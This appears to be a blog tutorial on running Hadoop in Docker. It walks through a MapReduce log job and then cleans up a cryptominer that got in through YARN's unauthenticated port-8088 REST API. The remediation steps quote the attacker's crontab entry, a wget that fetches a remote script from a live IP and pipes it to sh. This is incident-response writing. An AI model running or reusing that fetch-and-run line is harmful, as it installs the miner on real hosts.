Hadoop quick start: setting up a Hadoop environment with Docker, and fixing the YARN 8088 vulnerability

This section shows how to get Hadoop up and running quickly.
Steps to install Hadoop:
1. Operating system: Ubuntu 16.04 LTS
2. Install Docker
3. Use Docker to set up a Hadoop cluster environment

Preface: Docker is a great tool. It removes a lot of configuration work and boosts productivity; it is also one of the better products of the open-source world, and I personally expect it to drive an explosion of new technology.

To install Docker, see the Docker installation guide.

To set up a working Hadoop cluster on top of Docker, see the Hadoop installation guide.
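
The linked guide covers the details; in outline, you pull the Hadoop image and create the bridge network that the containers share (both names match the docker run example at the end of this post), then start the master and slave containers as the guide describes:

sudo docker pull kiwenlau/hadoop:1.0
sudo docker network create --driver=bridge hadoop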

Once the Hadoop environment is up, you can start using it.

Now let's use Hadoop to solve the following problem.

1. Given a batch of router logs (abridged), extract the MAC address and timestamp from each line, discard everything else, and implement the job following the MapReduce model.
Sample log lines:
Apr 23 11:49:54 hostapd: wlan0: STA 14:7d:c5:9e:fb:84
Apr 23 11:49:52 hostapd: wlan0: STA 74:0d:45:3e:28:f2
Apr 23 11:49:50 hostapd: wlan0: STA cc:af:78:cc:d5:5d
Apr 23 11:49:44 hostapd: wlan0: STA 56:8a:3d:e2:dd:63
Apr 23 11:49:42 hostapd: wlan0: STA 32:8b:3e:45:d2:77
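
The job itself is run later from a pre-built logcount.jar whose source is not shown in this post. Purely to illustrate the map step (emit the MAC address and timestamp, drop the rest), here is a minimal Hadoop Streaming sketch with a shell mapper; the file name mac-mapper.sh and the streaming-jar path are assumptions, not the author's program.

#!/bin/bash
# mac-mapper.sh (hypothetical): reads log lines on stdin, e.g.
#   Apr 23 11:49:54 hostapd: wlan0: STA 14:7d:c5:9e:fb:84
# and emits "<MAC>\t<month day time>" for each line.
awk '{ print $NF "\t" $1 " " $2 " " $3 }'

# Possible submission via Hadoop Streaming (the jar path varies by distribution):
#   hadoop jar $HADOOP_HOME/share/hadoop/tools/lib/hadoop-streaming-*.jar \
#       -input input -output output \
#       -mapper mac-mapper.sh -file mac-mapper.sh -numReduceTasks 0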

Extract the log, upload it to the server as filemax.txt, and copy it from the host into the container with:

docker cp filemax.txt 6938ef559b27:/root/input
# docker cp local_path container_id:container_path

Then copy the built jar into the container in the same way.
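
For example, assuming the jar is named logcount.jar as in the run script below (the destination inside the container should match wherever that script expects to find the jar; /root is just a placeholder):

docker cp logcount.jar 6938ef559b27:/root/
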
Use the following commands to inspect HDFS and clean up leftover files:

# list files in HDFS recursively
hadoop fs -ls -R
# delete a directory (output, for example)
hadoop fs -rmr output

Run the jar with the following script (run-macselect.sh):

#!/bin/bash

# create input directory on HDFS
hadoop fs -mkdir -p input

# put input files to HDFS
hdfs dfs -put ./input/* input

# run wordcount
hadoop jar $HADOOP_HOME/share/hadoop/mapreduce/sources/logcount.jar logcount input output

# print the input files
echo -e "\ninput filemax.txt:"
hdfs dfs -cat input/filemax.txt

# print the output of wordcount
echo -e "\nmacselect output:"
hdfs dfs -cat output/part-r-00000

Execute it with:

bash ./run-macselect.sh

and the job runs.
Problems encountered:
1. If a submitted job stays stuck in the ACCEPTED state and never actually runs, see link 1 and link 2 (YARN configuration quick reference; problem reproduction and fix).

2. YARN keeps running applications submitted by the user dr.who.
This is caused by YARN exposing its RESTful interface on port 8088 without any access control.
Symptoms:

# list the YARN applications
yarn application -list
# example output:
                Application-Id      Application-Name        Application-Type          User       Queue               State         Final-State         Progress                        Tracking-URL
application_1530927279601_0055                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0049                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0028                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0052                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0043                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0035                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0027                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0041                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0042                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0033                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0034                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0056                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0051                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0050                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0039                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0031                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0046                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0057                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0053                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0040                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0029                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0045                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0037                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0048                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0038                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0030                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0047                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0036                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0044                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A
application_1530927279601_0054                hadoop                    YARN        dr.who     default            ACCEPTED           UNDEFINED               0%                                 N/A

Congratulations, you've been infected. Attackers are exploiting the unauthenticated REST API of the Hadoop YARN ResourceManager, which lets them execute code remotely on the server without any authorization.
Running top shows CPU usage above 360%, and the system becomes very sluggish.
Remediation:
1. Find the process with the highest CPU usage and kill it.
2. Check the /tmp and /var/tmp directories and delete abnormal files such as java, ppc, and w.conf.
3. Run crontab -l; you will find a job like * * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1 and should delete it.
4. Go through the YARN logs, identify the abnormal applications, and kill them.
Then check top again: if a high-CPU process is still there, kill it; if not, things should be back to normal.
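
A rough command-level sketch of those steps (verify every path before deleting, and note that crontab -r wipes the entire crontab):

#!/bin/bash
# 1. kill the high-CPU process identified with top (placeholder PID, commented out)
# kill -9 <pid-from-top>

# 2. remove the dropped files named above from the temp directories
rm -f /tmp/java /tmp/ppc /tmp/w.conf /var/tmp/java /var/tmp/ppc /var/tmp/w.conf

# 3. inspect and then clear the malicious crontab entry
#    (re-add any legitimate jobs afterwards)
crontab -l
crontab -r

# 4. list the YARN applications and kill the abnormal ones
yarn application -list
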
Note: YARN exposes a REST API on ports 8088 and 8090 by default (8088 is the usual one) that lets users create applications and submit jobs directly. If it is misconfigured and left open to the public internet, anyone can reach it without authorization. Attackers use the open 8088 REST API to submit a command that downloads and runs a .sh script on the server, which in turn downloads and starts a mining program. So enable Kerberos authentication, disallow anonymous access, and change the 8088 port.

That is the expert's way of handling it.

If you are a more easygoing programmer, you can also kill the applications one at a time by hand:

yarn application -kill application_1437456051228_1725

You will soon notice, though, that you kill them more slowly than the attacker creates them, which is rather awkward. The next idea is to batch-delete them with a shell script, using the user name or the application state as the filter; that is left to the reader, but a possible sketch is shown below.
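
One possible sketch that filters on the dr.who user name (the application id is always the first column of the -list output shown above):

#!/bin/bash
# Kill every application submitted by dr.who that is still ACCEPTED or RUNNING.
for app in $(yarn application -list -appStates ACCEPTED,RUNNING 2>/dev/null \
               | grep "dr.who" | awk '{print $1}'); do
    echo "Killing $app"
    yarn application -kill "$app"
done
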
To view the details of a single application:

yarn application -status application_1530927279601_0054

The result:

Application Report : 
    Application-Id : application_1530927279601_0054
    Application-Name : hadoop
    Application-Type : YARN
    User : dr.who
    Queue : default
    Start-Time : 1530928629413
    Finish-Time : 0
    Progress : 0%
    State : ACCEPTED
    Final-State : UNDEFINED
    Tracking-URL : N/A
    RPC Port : -1
    AM Host : N/A
    Aggregate Resource Allocation : 0 MB-seconds, 0 vcore-seconds
    Diagnostics 

You can see that this application sits in the default queue.
For comparison, a job that has already finished:

Application Report : 
    Application-Id : application_1530927279601_0001
    Application-Name : word count
    Application-Type : MAPREDUCE
    User : root
    Queue : default
    Start-Time : 1530927318077
    Finish-Time : 1530927336994
    Progress : 100%
    State : FINISHED
    Final-State : SUCCEEDED
    Tracking-URL : http://hadoop-slave1:19888/jobhistory/job/job_1530927279601_0001
    RPC Port : 38879
    AM Host : hadoop-slave1
    Aggregate Resource Allocation : 66867 MB-seconds, 40 vcore-seconds
    Diagnostics :

The fix:

First, use iptables to restrict port 8088 so that it can only be reached from the office IP range.
Then enable Kerberos authentication.
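
A possible rule set for the iptables step (203.0.113.0/24 stands in for the office network; adjust it to your own range):

# allow the YARN web UI / REST API only from the office network, drop everyone else
sudo iptables -A INPUT -p tcp --dport 8088 -s 203.0.113.0/24 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 8088 -j DROP
# repeat for 8090 if the HTTPS endpoint is enabled
sudo iptables -A INPUT -p tcp --dport 8090 -s 203.0.113.0/24 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 8090 -j DROP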

Check the firewall first:

sudo ufw status
# output:
Status: active

To                         Action      From
--                         ------      ----
22/tcp                     ALLOW       Anywhere                  
8088/tcp                   ALLOW       Anywhere                  
22/tcp (v6)                ALLOW       Anywhere (v6)             
8088/tcp (v6)              ALLOW       Anywhere (v6)             

Now the From column for port 8088 needs to be narrowed down to a specific address. After quite a bit of fiddling, however, ufw did not seem to take effect.

Usage: ufw COMMAND

Commands:
 enable                          enables the firewall
 disable                         disables the firewall
 default ARG                     set default policy
 logging LEVEL                   set logging to LEVEL
 allow ARGS                      add allow rule      e.g. ufw allow ssh
 deny ARGS                       add deny rule       e.g. ufw deny 80
 reject ARGS                     add reject rule     e.g. ufw reject mysql
 limit ARGS                      add limit rule
 delete RULE|NUM                 delete RULE
 insert NUM RULE                 insert RULE at NUM
 route RULE                      add route RULE
 route delete RULE|NUM           delete route RULE
 route insert NUM RULE           insert route RULE at NUM
 reload                          reload firewall
 reset                           reset firewall
 status                          show firewall status
 status numbered                 show firewall status as numbered list of RULES
 status verbose                  show verbose firewall status
 show ARG                        show firewall report
 version                         display version information


Application profile commands:
 app list                        list application profiles
 app info PROFILE                show information on PROFILE
 app update PROFILE              update PROFILE
 app default ARG                 set default application policy
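
For the record, ufw can restrict rules by source address; a sketch that swaps the blanket 8088 rule for one limited to an office subnet (203.0.113.0/24 is a placeholder) would be:

# drop the blanket allow rule, then allow only the office subnet
sudo ufw delete allow 8088/tcp
sudo ufw allow from 203.0.113.0/24 to any port 8088 proto tcp
sudo ufw reload

A likely reason ufw appeared to have no effect here is that Docker publishes container ports through its own iptables rules, which bypass ufw.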

After a few failed attempts, I ended up writing a batch script instead:

#!/bin/bash
# Kill a range of YARN applications.
#   $1 = cluster timestamp (the middle part of the application id)
#   $2 = first sequence number, $3 = last sequence number
for ((i = $2; i <= $3; i++)); do
    # sequence numbers in application ids are zero-padded to 4 digits, e.g. _0055
    app=$(printf "application_%s_%04d" "$1" "$i")
    yarn application -kill "$app"
done

Run it as follows to delete the applications created so far:

./deleteyarnapp.sh 1530927279601 1 260

Another option is to change the published host port when starting the container, so that the REST API is no longer exposed on the well-known 8088 port.
For example:

sudo docker run -itd \
                --net=hadoop \
                -p 50070:50070 \
                -p xxxx:8088 \
                --name hadoop-master \
                --hostname hadoop-master \
                kiwenlau/hadoop:1.0 &> /dev/null
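
Once the container is up, you can confirm which host port is forwarded to the container's 8088 with docker port:

# prints the host address and port mapped to the container's 8088
docker port hadoop-master 8088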
